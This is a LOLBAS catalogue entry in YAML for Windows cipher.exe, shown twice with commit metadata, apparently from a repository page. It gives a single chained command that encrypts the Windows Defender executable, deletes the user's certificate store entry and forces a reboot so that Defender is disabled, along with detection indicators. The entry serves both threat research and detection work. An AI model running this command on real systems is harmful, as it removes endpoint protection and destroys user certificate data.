LOLBAS/yml/OSBinaries/Cipher.yml

---
Name: Cipher.exe
Description: Security Tool for the Windows Encrypting File System
Author: Alexander Sennhauser
Created: 2023-01-09
Commands:
  - Command: cipher.exe /e "C:\ProgramData\Microsoft\Windows Defender\Platform\*\MsMpEng.exe" & certutil.exe -delstore -user my %username% & shutdown.exe /r /t 0
    Description: Encrypt the Windows Defender binary to disable the service after a system restart.
    Usecase: MSFT Defender bypass using LOLBINs
    Category: Tamper
    Privileges: Admin
    MitreID: T1562
    OperatingSystem: Windows 10 All
Full_Path:
  - Path: c:\windows\system32\cipher.exe
Code_Sample:
  - Code:
Detection:
  - IOC: cipher.exe spawned with unusual path arguments
  - IOC: certutil.exe spawned to delete user certificates
Resources:
  - Link:
Acknowledgement:
  - Person: Alexander Sennhauser
    Handle: '@conitrade'
document cipher.exe usage to disable services 2023-01-09 11:00:40 +01:00			`---`
			`Name: Cipher.exe`
			`Description: Security Tool for the Windows Encrypting File System`
			`Author: Alexander Sennhauser`
			`Created: 2023-01-09`
			`Commands:`
			`- Command: cipher.exe /e "C:\ProgramData\Microsoft\Windows Defender\Platform\*\MsMpEng.exe" & certutil.exe -delstore -user my %username% & shutdown.exe /r /t 0`
			`Description: Encrypt the Windows Defender binary to disable the service after a system restart.`
			`Usecase: MSFT Defender bypass using LOLBINs`
			`Category: Tamper`
			`Privileges: Admin`
			`MitreID: T1562`
			`OperatingSystem: Windows 10 All`
			`Full_Path:`
			`- Path: c:\windows\system32\cipher.exe`
			`Code_Sample:`
			`- Code:`
			`Detection:`
			`- IOC: cipher.exe spawned with unusual path arguments`
			`- IOC: certutil.exe spawned to delete user certificates`
			`Resources:`
			`- Link:`
			`Acknowledgement:`
			`- Person: Alexander Sennhauser`
			`Handle: '@conitrade'`